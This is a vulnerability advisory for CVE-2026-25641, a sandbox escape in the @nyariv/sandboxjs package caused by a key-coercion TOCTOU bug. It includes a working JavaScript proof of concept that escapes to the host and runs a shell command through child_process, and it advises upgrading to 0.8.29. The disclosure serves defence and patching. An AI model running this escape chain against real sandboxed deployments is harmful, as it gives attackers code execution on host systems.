CVE-2026-25641
@nyariv/sandboxjs vulnerable to sandbox escape via TOCTOU bug on keys in property accesses
Description
### Summary A sandbox escape vulnerabilities due to a mismatch between the key on which the validation is performed and the key used for accessing properties. ### Details Even though the key used in property accesses (```b``` in the code below) is annotated as ```string```, this is never enforced: https://github.com/nyariv/SandboxJS/blob/6103d7147c4666fe48cfda58a4d5f37005b43754/src/executor.ts#L304-L304 So, attackers can pass malicious objects that coerce to different string values when used, e.g., one for the time the key is sanitized using ```hasOwnProperty(key)``` and a different one for when the key is used for the actual property access. ### PoC ```js const Sandbox = require('@nyariv/sandboxjs').default; const code = ` let a = new Map; a.x = 23; let count = 0; let nastyProp = {toString: () => {if (count<1){count++;return "x"} else return "__proto__"}} let mapProt = a[nastyProp]; mapProt.has = isFinite; console.log( isFinite.constructor( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), );`; const scope = {}; const sandbox = new Sandbox(); const exec = sandbox.compile(code); exec(scope).run(); ``` ### Impact Remote code execution, if attacker can execute code inside the sandbox.
How to fix CVE-2026-25641
To remediate CVE-2026-25641, upgrade the affected package to a fixed version below.
- —upgrade to 0.8.29 or later
Is CVE-2026-25641 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 0.8.29